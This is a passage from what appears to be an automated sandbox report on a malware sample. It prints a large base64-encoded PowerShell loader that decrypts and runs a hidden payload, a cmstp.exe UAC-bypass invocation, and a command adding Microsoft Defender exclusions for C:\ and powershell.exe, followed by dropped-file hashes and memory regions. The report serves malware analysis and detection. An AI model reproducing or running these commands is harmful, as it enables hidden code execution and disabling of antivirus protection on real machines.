TAGUAaQBSAGIAWQBpAFAAaAA5AGcAUgBiAHoAaQB6AFYAcQBZAFoAYwBKAHEAMwBWAGgAegBGAGgAeQB5ADYANgBRAG4AQwBCAFEAbwBmAE0AQQBRAEMAagBSAE0ATgBjAGIAdgA2AGQAVABQAEQASgB2AGoAawBwADEAZwBVADgANgBHAGwAVgBVADUAVAB1ADYATgBOAGwAOAB6AEcAdwBUAGIAaQBlAEgATQBJAC8AUgBXAGUAWgBNAGgAawBpAG0AbgBGAE4AbwBvAEIAQgBQADYAYQB5AEIASwB5AHYAZwBDAE0AZABkAE0AUgBJAFMAdwBpAEcAQQBVAEYAeQBPADgAZQBBAEMAcABYAGkAQwA0AGQAWgBFADMAZABYADcAUABhAFMAcQBkAHUAMwAzAFUAKwBIADQAOABLAEsARQBsAFkATgBKAEEAMQA4AGUARQBoAEUANgBlAGgAYwB4AEoAeQBLADQAbABKADkAMwBSAEEAYgBmAE8AZwBWAEkAdwBqAFgATQB2AEoAdgBnAGUAYgBiAHoAMABXAFAARgBrAHYAeQA3AHYAbwA4AHcAbABSAHMAVQBXADQAMQBWAE8AcQA2AHMAaABHAHQAUAAyAFIATwBsAGcANwAzAFIAOQBOAEQAVgA5AFcAdABtACsAbgBQAGcAbwBiAHIAegBqADIARwBJAE8ARwBrAGUAVABhAGYAUgBsAFUARgBhACsAMwBvADUAQQA4AEsAMQBMACsAYQBuADAAcgBBAEsAQQBNAGoARwBsAEgAagBFAHMARgBzAEQASgBrAEYARABzADcAYQBBAEQAbABDAFgAbABLADIASQBaAE8ASABLAGEAZABvAEIAMwBvAFMARAA2AEIAUgBsAFkAZgBxADMATABSAC8ANABhADgAQwA0AGEARABVAFkATgAwAFMAbAB2AHEAZQBkAHcAawB6AG0AMQBDADQAegBsAG8AWgBJAGoAUgA2AHQAZwBJAFMAVgB5AFkAbQArAHQAeQBFAEMAUQBJAE0AWABlAGIASABSAEcAYQBWAE4AeABLAC8AeAA3ADUAawBEADkAUwBvAEgAdQBTAC8AVgBIAEsAQwBKAFkAYgBkAEYAMQA1AHoAZQBsAEkAeABkAFUAegBiAG8AcgBtADgANQAzAFIAMABRAEEATABkAGIANwA2AC8AcgAxAG8ARQB4AHkASgBFAEIAaABXADgAMgBEAHAATwBpADkAcQAvAGMAcQBkAG4ALwBkAHUARABuAGoAVAA2AEMAcwBXADcAdQBYAFIAYgBXAEgAWgBvAHgARABzAGEANABvAEEAQwBIAEsAcwBrAFcAaAAyAGYAYQB1AFIASABnAE0AVQBsAFIANQBXAHMALwAvAHMAMgBRAFIAQgBpADcASwB2AHcAYQBFAEYAUgBMADUAUQBuAHMASwBUAGQARABhAHEANwB2AGYAdgBUAFIAMABKAE0ANwAyADUAdAB2AGUAVwBQAEEARABEAGgASQBBAFYANQArAEEAegByAHkARABsADUAVwB6AEwATgB5AHgAYwBGAE4AcgBBAEwAOAB0AEEASABaAFIANwBTACsAeABzAHoAagBJAE0AUQBhAFMAdABKADIAdgBPAEwAOAAwAFgAMAA1AGkAOABuAE4AVwBYAHIALwBRAHUANAB1ADMANwB6AEwAUQBuAGEAOQBMAEIAZQBPADAASABKAG0AZwBJAHgAdgBrAEgANgA2AFIAWAA1AEIATABMAGUAcQAzAFkARQBhAFkAcABYAFUAKwBWAEIAMgBXAEsASgBPAEUAUABNADkAYgBVAFoAMwBPAHYAMQBkAGYAQwBhAGwANwBkAG0AMABKAHcAUABjAFYAWAAzAGIARwBFAE4AVwByAFYAUwByAFUAUQBPAFIAQQB5ADAAWABkADIAVwBIAEgALwBlAEgAWgAxAHIATQBHAGYAWQBRAGEAKwB5AGMAdwBUADUAMgBSADIAZwBVADcANgBwAE0ANABuAFUAMAA3AEsARgBjADYAaABOAHgAMABWAGIATAA4AEYAMQBNAFYAbAB4AGwARABhAE8AaQAvAGUAZQBMAFkAMwA4AFMAOABkACsAawB1ADIASgBZAEMALwA5AE0ATQBNAG8AVQBLAHAATQAxAEkARgBDAGgATQBzAFAAcgA5AEkAYgBQAFYARABNAEsANQBCAEEAMAAvAEgAdgA3AGQARwBwADgAUABsAHEAQgBYADkAbwBSAGoATQBwAE8AWABEAEYARABLADkAKwBvAHkAaQA3AE4AMQBXAGUASgBYAE0AWQBaAHcAUgBjAEYAeABtAFMAWgBGAGgAdQBFAG8ARgB5AHgASwBxAEkAMwBoAGYAKwA4AGQAWQAwAEsAWgBBAHEAQwBxAC8AagBKAFkAQwBXAE0AUwBqAEcAWgBRAEkAaABKAHIAOQByAGEARABFAGkATAB0AGwAcgBUAGgAVwAwAG8AYQAyAHEAQQBtAC8AcwB4AHEAbABzAG8AQwBpAGoAZQBBADIAeABTAE4AawBkAGoARAB0AE8ARAA5ADIANABuAE0AQgBOADQATQBQAFUAVwAwAEoAVgAvAHkAawBhAHoAcwBGAG0AdABlAGoAQQBBADMAWgBsAEIAawBPADQAdABOAHAASgBEAGsAaABwADAAMAB1AEUARAAxAEMALwBWAHMAZwBhADkAcQBqAEsAUABVAGQATgBsAHkAeQBqAEEAQgBOAFgAUABXAHQAMgBPAFIAZwA1AFoATQBUAFQATQA2AE0AUwBtADIATwBWAGIATgAvAFoAeQBUAE4AYQBvAGMARgBaAFgAQwBRAGgANQB5AFoAegBxAG4AeABLAE8AdgB1AGUAZwBNAGYAbABaAHQAWgAwAG4AQwBWAE4ATABRAGEAaABxAGsAQwA3AFMAcABrADcAWgB2AG8AaQBtAEsASABkAFQAdAB5AHYAUABsAGQAWAArAFUASwAyADEAcQA4AGIAbABJAGIANgBPAGUAYgBvAEoAMQBrAFAAMQBoAEUATQBaAEQANQA5AGIAZQBzAEgAMwB5AGIAVABFAGkAbgA5AHEANgAxAE8AVgA0ADEALwB4AGQATQA5AFEAawBkAGEAMgBmAG4AZQBCAGMAQgBEADUAQQAxAHMAVgBoAHYATQBLAHQAWQBOAG4AaABHAGoAcQB1AG8AbgBGAFEAcQB4AHAAUgBxAFIAZwAyAGEASABYAE0AUgB5AHcAbwAzADEATQBzAGwAWgBaAFIASABBAHYAMABEAHIAYwB3AGQARAByAGYAOABDADYAWABEAEgAMQBQAHcAWgBVAFMARwA3AEkAMgBTAHIAcQBBAGsAUwBFAE8ASgBPAGUASQBUAGUANABYAEoAOQBwAGcAUQBxAEMAdAB4AEMAMgBkAGUARABqAHUASQBaADkAMQBRAGQAbQBkAGgAMwArAFYASgAzAHkAKwBVADIAdQBJADgASwBPADgAMABYAEsAMgBRAFgAeABrAG0ASABIAG8ARgB1AGsANAAzAG8AdABTAEgARwBKAFgAQwA1AFoAZwBaAHYAcgA5AHkAYwArAGIARQBqAFYATwB3AFcARwBKAEcAUgBDAGIAaQBvAEUAbAAzAHcAegA4AGIAUwA4AEIATABrAHYARwBpADUAZwBHAGYAbQBMADkAbAB3AHoAUgBJAEwAVwBZAE8AbQA1AHUARwBXAHQANgBJAHoAKwBnAHcAMQArAFIAUABlADYASQBtAHgAVQBkAHcAZwBCAGcAVABoAEsAZABOADIAWQBGAEwAUgBhAGsAcgBQADcAdABEAGMANQA1AFMAbABFAHkAZABWADAAbwBaAEEAUABYADEAdABtAHAAdgB5AEIANgA0AHcATwBuADcAMABKAEUANABiAEkAQQBuADMATgBuAFgAZwBVAFcAQgBaAFIASwBjADYAbAByAHAAeABZAEwAMgA3AHkAaQBvAEYALwBPAGYAMQBIAEgAUAB0AHkAcgBWAEIANAAvAHIAZgB1AC8AUgAzAFIAMgByAGYARAAvAFQATQBvACsARgB3AFgAaABYAFMARwBqAHkATABuADcAKwBxAFcAdABaAGcAQwBJAHgAUQBIAFkAbwBiAGUAUgBDAHIAQwBBAFUAZwB4AHEAZgBJAGUAegBPAEgASQA4AGEAeABKAHMAUgBtAHQASgArAGYAMgAyAHEAMQBPAGIAagBvAFYAbABDAG8ATwA3AEgAZgBLAE0AdgBwAGkAMABaAEMAbwBzAGQANQBtAFgAKwB1AGgAbABGAGYAQwBKAFMALwBkAFYAeQBOADgAawBLACsARgAxAHAAMgBzAEcAcABCADMAWgBrAEIAYgB0AGwAWAA3AG4AeQBJAGcAQgBaAFgANgBEAEYAcgBmAEwAUQA4AFMANQA4AE0AZwBaAGsAWgBTADQAYgAwADEAOABFADQAZwA5AEMAeQByAEMAVQBvAGIAMwBhAHUAQgBMAG8AQQB5AHYANAB0AEQAWQBPAGsAOABnAGsASwB6AFUAZgA0AHQAdQBtAEUAcQByAHAAWQB4ADQAbABPAGIAdQB6AHUAMgBEAEEAOABBAG8ALwBwAEMAVwArADYAUQBaAGEAaABiAG4AUwBDAGIANABhADAAVwBVAG4AYgBJAE0AVQBlAEoAZABKAEkAeAA1AFcAOAB0ACsATQBUAHQASAB1AHUASABpAFIAawA4AGIAbwBDAEEATwBtADUAdgBXAGsATgB1AGwAeABxAC8ALwBkAFQAZgBSAFAAZwBGAEUAVQBQAHgANQBGAGgAegBKAE0AcwB1AGMAYgBhAEwANQArAFQAdABkAGwATgBxAFgAZAArAFcAMgBsAGQAUAAxADUAbwArADgAZQA0ADkATwB1ADAASwA5AG0ARwBaAHQAVwBhADcASAAwAHEAeABEAGwAMgBkAEMAZABPADgARQBBAFMATQBIAEsARABBAFUAZwA3ADkARwBNAG0AMwArAGMAVwArAHYATgBRAHoAQgBDAHcANAAwADQAWgBQADYAeQA3ADYAYwBHAGwANABrAE4AcgBHAHkAaQBrAFAANwBhACIAKQANAAoAIAAgACAAIAAkAGkAIAA9ACAAJABkAFsAMAAuAC4AMQA1AF0ADQAKACAAIAAgACAAJABlACAAPQAgACQAZABbADEANgAuAC4AKAAkAGQALgBMAGUAbgBnAHQAaAAgAC0AIAAxACkAXQANAAoAIAAgACAAIAAkAGEAZQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAANAAoAIAAgACAAIAAkAGEAZQBzAC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAgACAAIAAgACQAYQBlAHMALgBLAGUAeQAgAD0AIAAkAGEADQAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAGkADQAKACAAIAAgACAAJABkAGUAYwAgAD0AIAAkAGEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAA0ACgAgACAAIAAgACQAbwB1AHQAIAA9ACAAJABkAGUAYwAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGUALAAgADAALAAgACQAZQAuAEwAZQBuAGcAdABoACkADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdAApAA0ACgAgACAAIAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAcgBlAHMADQAKAA== -inputFormat xml -outputFormat text
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1464
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afs4ya1k\afs4ya1k.cmdline"
                                          4⤵
                                            PID:3320
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AC4.tmp" "c:\Users\Admin\AppData\Local\Temp\afs4ya1k\CSCCD6D63AEAC224EDEADAE592AB927829A.TMP"
                                              5⤵
                                                PID:4952
                                            • C:\windows\system32\cmstp.exe
                                              "C:\windows\system32\cmstp.exe" /au C:\windows\temp\4zryum0t.inf
                                              4⤵
                                                PID:3512
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
                                          1⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4048
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /IM cmstp.exe /F
                                          1⤵
                                          • Kills process with taskkill
                                          PID:3032

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\88fbe54b-94e1-48ae-92f2-5143f7bd019f.tmp

                                          Filesize

                                          10KB

                                          MD5

                                          7ea13207b8f0424314391e17ab9df17c

                                          SHA1

                                          f67b596cc11a34c47b8990bf241b952aef17a563

                                          SHA256

                                          2c1bfbeff60921bbf5693cb6188812a865c388bc74ee74d0f2ecce1ef40ffd62

                                          SHA512

                                          62cce0ae5f578781c73920f512d2ab6ff8952fc28c20afec52addf056088c28d8b8cb6b27328e7fb405774606dfaded84044097dd9a2050d3c7f9bd552394850

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                          Filesize

                                          649B

                                          MD5

                                          3b0b7bca0e84520f5ad83ebed678d1fa

                                          SHA1

                                          386d73606231d125b63743ea410e7b2ad297c567

                                          SHA256

                                          52529c2f8fe656a419ec06e628f54d615e9bf6fb8d5f02bb9d7ee71eeb12eb49

                                          SHA512

                                          7c97a3df3e0676f55f3884ff8a8d0ba7ee6d5251d3be21831cbf7da6565498a6b38e3c9892416f03d664afcb8e7ade7424d9ab27e348046b89eea5ee791b96f0

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                          Filesize

                                          384B

                                          MD5

                                          3d7444e297fbc2e46aa484c05ad496a8

                                          SHA1

                                          201837c793beefcb31e012e50c6144f96833c93d

                                          SHA256

                                          9514cfbec6c3968f4b95c04e7136adcd3f6bcf4da2617a927374a75b13be1a8a

                                          SHA512

                                          60f31aeddadff3e94e950ec8fa0b8f31dc01bced8c838b45dc7e084277bffc77ffd273e741ac02db919d79302c080233a6ee5cda7fc087d9c7b68543e5ffdd5b

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                          Filesize

                                          2B

                                          MD5

                                          d751713988987e9331980363e24189ce

                                          SHA1

                                          97d170e1550eee4afc0af065b78cda302a97674c

                                          SHA256

                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                          SHA512

                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                          Filesize

                                          859B

                                          MD5

                                          c8f3ea5f071319c9ef3469c1c41b3bfc

                                          SHA1

                                          e09be0a59291182f39720653ba88dc99a7363a80

                                          SHA256

                                          fd345c65c6d6d06445c0be23682c8dc556974f0fc4324c7d31e8eb71c5308026

                                          SHA512

                                          59513378566f373ebd23f6f930dd6d291e61fa5c3048e9431f4ade8ec2eeab72a213f811e8c4531d2f4c8ccf0d28272560c3f73383224c6fb63c108ac86aa940

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          85d40e8f100d8869cd1138cba5a7edb6

                                          SHA1

                                          10890dde574bb7888aaa1c7957e8bed04c59613b

                                          SHA256

                                          c8ec323755b9b0bf8a289ce2d2fb431e1fa22540009a1cf775070ee482f3707b

                                          SHA512

                                          2a3824faeb9347c6e31161039e32f193fdd7c341066832004f17de58fe4d737196624ea802ade697a372738fdbaeb3f736036631017679de593d7372999263ce

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          10KB

                                          MD5

                                          2a026ab37d5929b7d7dfc65c04011044

                                          SHA1

                                          fa4340cd89408af665e022888e508aa2301f27eb

                                          SHA256

                                          9cc7425cd3310dae4a5fae6c645af2a41b4464b98dcc8e706e32de701b3c2fcc

                                          SHA512

                                          8c818823260fedfe78e280ed5027bbe4ad2b2f581a716878f02d9e0e4e06170c318ee8627253e25b8a9012def78fb3f1be0f309d00cb0022336b481adf95d824

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          10KB

                                          MD5

                                          bed7a4b6d595116963519003713fdd7a

                                          SHA1

                                          b7096c2cf217298547a858b4832a18347e95f754

                                          SHA256

                                          7a0f76d481c517817e6261ac739aa09db907ad2c04250695852bbaeaccf07234

                                          SHA512

                                          4ead5a4cbf9bcc0cc9a4978bdab7161375951185192deff2d2f60487dff1f6631aae515cc5d3284e518b761b2897441a8c2564519455e1a7332c81c29fdaa480

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          116KB

                                          MD5

                                          7f198575c36718bb2ce28f23e6c626ff

                                          SHA1

                                          300c9c9f9042d5d082e832e7bb4b2d2d07764c30

                                          SHA256

                                          ab65cbc1a327776f9c4e82e3ef1fb9ad912c518aea92121d932f3649a36a6108

                                          SHA512

                                          e694728080c65257ab57741c9b126aeec5a353fa0e354dccb2165b36e2bec3fb27e8e6d313b4f17acd50d50dc99aef5c910cb01de01228b27d1b15f0c6cf6db7

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          116KB

                                          MD5

                                          b49f72c5770e83b9ed3cae1f9ae1ac20

                                          SHA1

                                          279c7b0d1fe646c81b7c77bd54df2569bbcea90a

                                          SHA256

                                          84e9f1ea24413d9ad868d0642550f6dae1e9b51d0e80b85700a37ae88a56bd16

                                          SHA512

                                          0b6d962154fc981333772ee880df890a8a9c7a297d2f1e3be6ae9fe633f879698a09ff0fe0929c058ac0cc7d49bd42681782aae450125f8b38e138fef1d6298c

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          2KB

                                          MD5

                                          d85ba6ff808d9e5444a4b369f5bc2730

                                          SHA1

                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                          SHA256

                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                          SHA512

                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          78f1d103c6e2309d01ceeb29f5781578

                                          SHA1

                                          01b6fe7fd3f66c7fcbf330bfebe267bb92aa3b96

                                          SHA256

                                          fb7fedd79540c7aabe04e890f0a92962c183a86c9ef6b426cb5c4d95719943b2

                                          SHA512

                                          7229a01a6ee674e4b98eed231e5eec9706cfd0a9710c3b921bb380b78f45f25d68db8fd40ce1bcbbe506c8fead7d7b2d949a101a82de79011e975aac34313b7e

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          43f4bec966ab901ac034fc136a642fa5

                                          SHA1

                                          8e7227cefec8b05c9a79b2751d1261187b9c0422

                                          SHA256

                                          09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

                                          SHA512

                                          a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          255c08fc8d1d42288224b473708380d3

                                          SHA1

                                          9105334c6411c493ef60bce9a5f61bd8cf6337b8

                                          SHA256

                                          7580735ab23e486470a4a1324cf01019539f0de44254468ec59910b77268ba1d

                                          SHA512

                                          cc4d8dd21442d05c06677c44955b233e7df07b852f74b94d62bc1a0eea0c732454a96a986e862a4e146e45541a4095e0c1231ce54a82abaddf7f9f5197e4ef6a

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          8cc29c73d605e106eb8f1dd914aade36

                                          SHA1

                                          a54f702be7efcf42bc4ab393994f8a64e46ad24b

                                          SHA256

                                          5740792fcd269e4f51f41377e54fee91c53a2daf2964cbfd34bf19225bb7cc30

                                          SHA512

                                          7191f4627c1e3aae170ca7ee2d9ecf7af04975171c98e0b0d2e44ca9790b6ff74f62ab075d8f996f123d2848a66c5181e04bc6df46be92ea21d0b29fd4adaee5

                                        • C:\Users\Admin\AppData\Local\Temp\RES2AC4.tmp

                                          Filesize

                                          1KB

                                          MD5

                                          52b844c8a63c921a4966541319642510

                                          SHA1

                                          59e168a6070e259222d969935d14e26532db0e79

                                          SHA256

                                          d4de1a25903946b1130877fb04f4c8a17582ac66e294fe4cbab817c875ebb0e7

                                          SHA512

                                          239e515ed1632cad6217c9c42f3402f0b6da0f674ee945a899353e0879ea6ff1fe21dfbdc7679a4cdb84ca1dc77c60bb9a32bac653e1d034b574d48f4e57a1d2

                                        • C:\Users\Admin\AppData\Local\Temp\RESF4EF.tmp

                                          Filesize

                                          1KB

                                          MD5

                                          0c64879c88f1cbac35a499ccc586d1e6

                                          SHA1

                                          6421ce271e629f57999972da6b7e929763d0b07e

                                          SHA256

                                          d2dab9b358b28d2886b39df0f985ce7983e1f18420d389aa8f3ec812519829d5

                                          SHA512

                                          81e5a04c8305adf758b5e89cc62b01d44bab785ebde2268de0d907a6a321c011d1752bb94f063e65704833aabb199f3fdf1593505cb3a0933ddaf93d18099164

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_osx4p10o.p2g.ps1

                                          Filesize

                                          60B

                                          MD5

                                          d17fe0a3f47be24a6453e9ef58c94641

                                          SHA1

                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                          SHA256

                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                          SHA512

                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        • C:\Users\Admin\AppData\Local\Temp\afs4ya1k\afs4ya1k.dll

                                          Filesize

                                          4KB

                                          MD5

                                          cbdf509c9ad4000cf034cbe198229c8a

                                          SHA1

                                          cfa9b7f61c40bbb902599e98f0005e9f7e05e993

                                          SHA256

                                          d4642b2f31f26c036c643af6789796c41e7639f01c5723c43eed289e57183caf

                                          SHA512

                                          acf7ea29fa9520fbb665b625f38938ffba5afcd29e2087b2ce270aede362f05d8820dbc77797a71800496318f714f3ee38cc979ab62f73bc954d9b0542eb3af1

                                        • C:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.dll

                                          Filesize

                                          4KB

                                          MD5

                                          77c6f2b67ea1be8525b05c3714b0f0bd

                                          SHA1

                                          8ba7389fb36e106128fd9e15714825b4204f471d

                                          SHA256

                                          eb30042bb402728c246b6621ec894792a896151687980a840d4c2583c68eee2f

                                          SHA512

                                          d4152d34cd0d676c175ac8913f800021bc2200447dea379400f7bb3273a094de12692b30ae40fe8d1edee4f26bad18b6a3fe90a42c4615a926f31b8000b51b4c

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                          Filesize

                                          6KB

                                          MD5

                                          dddfd29a1be7099c120d960b7081d5f6

                                          SHA1

                                          03abc57ce531281eafb26a1e5af257b7c4e70877

                                          SHA256

                                          43b47c803206f2a8ee24dfeb83618d571e66edfdb5dc378d90f957123688f501

                                          SHA512

                                          b051051dfc4cfbfad34119aef6f4af41e57aa0a2ac1ece11518ce96a699760c3919377a3e20e4295451cecbfcdb4eb41d43f785df0a41114a9ade537d7cebea8

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                          Filesize

                                          6KB

                                          MD5

                                          38cd2bbb8147480ebbe73aa400e4d9f1

                                          SHA1

                                          ce5c537abe4f2b23bd2b0be2747366b930052456

                                          SHA256

                                          9bec1266b97e88c90bb6ac2e8545436ded8858facc460f46405f7fcacbc547a8

                                          SHA512

                                          c00b7f78719dc55e37dc89f5a934ce6f6b440baaaa878e5426e9df1ca680f3921f737830385cb32a7a8ae21cfea35735dfaa55cce33d42bfba87b8d104e3558c

                                        • C:\Users\Admin\Downloads\Unconfirmed 254778.crdownload

                                          Filesize

                                          78KB

                                          MD5

                                          f5bfac09b17af66506e500ce22c71f92

                                          SHA1

                                          bf949f2cb7457bcc173e0b98f656be133a088225

                                          SHA256

                                          6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663

                                          SHA512

                                          5cab281eae07d317c02f031986b472967b4ffdca1dc3343d4e697f1ae1d8503ba237e5e1c7b60b55154f29421f7d3c79e1f125b56f96b98bcd58fa1677756d26

                                        • C:\windows\temp\jsb3ci3v.inf

                                          Filesize

                                          687B

                                          MD5

                                          99fdcef63da22bd2d90299ebd3830493

                                          SHA1

                                          15c9313961d29d25938a9a1279cd484611c6f4f9

                                          SHA256

                                          9872a418ded853162e67f6054b17d6abdcd9f5bdac087d262a5f2604a61e797b

                                          SHA512

                                          fb1f13444fd6ae5b692f496481a9601de231ef542ca638c0a21653184fffe5a650c64bea35808d021ec9356808a7f0873a8e908ec2ccdbdc01a321f24e752d66

                                        • \??\c:\Users\Admin\AppData\Local\Temp\afs4ya1k\CSCCD6D63AEAC224EDEADAE592AB927829A.TMP

                                          Filesize

                                          652B

                                          MD5

                                          82071e12c31b64727bf97f211ca3734c

                                          SHA1

                                          8170db61c5e452678302244ec06edd73624fa616

                                          SHA256

                                          1741d5ac1ec935d74eba86721868e94e7ccb3ba4e1ffb5637f827f96a3ce1d53

                                          SHA512

                                          f72ad2c9f16025d45914be7e8e3a03b7408e43cfb9b48258b23518a91eae72392d8e6d5616ea476ea2f9f168a7b61c1e9e7520e6d051d1f59a789dfae29bc1bd

                                        • \??\c:\Users\Admin\AppData\Local\Temp\afs4ya1k\afs4ya1k.cmdline

                                          Filesize

                                          369B

                                          MD5

                                          866dbd9aaeafe09326fe8d71ab1aa3f9

                                          SHA1

                                          495509af447b38f5a16a1f0e878e2b07375f529f

                                          SHA256

                                          9ebc9fb37dd1adb0b8ea253a943c633e5cdcd182e57a8cfe7f511cd0333e638a

                                          SHA512

                                          893a17dd00ae744175ba22a4dbc459d20f51214ef698f31f00b981cbac5c7dba5e81a723045a83290108a83731f9d839d802ae6d170c8bd626f40756ab949ef7

                                        • \??\c:\Users\Admin\AppData\Local\Temp\byewnwba\CSCBD104D52795439298FD9C6C17D11038.TMP

                                          Filesize

                                          652B

                                          MD5

                                          216460d2cdd5297adafa778de716bd85

                                          SHA1

                                          f515bd38b5e0f915c9201a13608cccbcf19c3bba

                                          SHA256

                                          67deac13d5ddbf9ae330ac989c82554e4107eeeaece34b47e585b855fa2aa7dc

                                          SHA512

                                          efbb964a40b61ac35ed0e2d10443201a5aa5ec5ad78d72382982171d82d2c5e2161f6f4d4435063901af661869d8e769a9dd3fcdc4701399c3357f57c5d3e80b

                                        • \??\c:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.0.cs

                                          Filesize

                                          2KB

                                          MD5

                                          da774b7c7335bf78596f22c13b46a80c

                                          SHA1

                                          43d248947111e2d943aa1c77df51fd5192e92797

                                          SHA256

                                          da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8

                                          SHA512

                                          9c8efab5895c50069512e56b4efc81547f70092064cad8cf526a77f087dace036e876e4da5178d30be213b0c3d9214ef660920c6eff2c7474e5a6d47dfea40d0

                                        • \??\c:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.cmdline

                                          Filesize

                                          369B

                                          MD5

                                          89621c70399849c529aeec7640730424

                                          SHA1

                                          c4918ffa05b26c4106df681ca54bc81783f0baf9

                                          SHA256

                                          1d639197af33c0879f0b5aebba00ac48ef6b7d4ff564b97837083978c4bd8204

                                          SHA512

                                          bf77dee8cc76c2408773cfa89affa0db864cea3af25696e470dad04e012ca9669c8adede2233ae30be7206f90fcad45490cb61c95641ebdcb3bf9b86a76c2c6b

                                        • memory/1464-214-0x00000270DFB10000-0x00000270DFB18000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2992-127-0x0000023C7EB20000-0x0000023C7EB3C000-memory.dmp

                                          Filesize

                                          112KB

                                        • memory/2992-140-0x0000023C7EB40000-0x0000023C7EB48000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4164-117-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4164-116-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4164-167-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

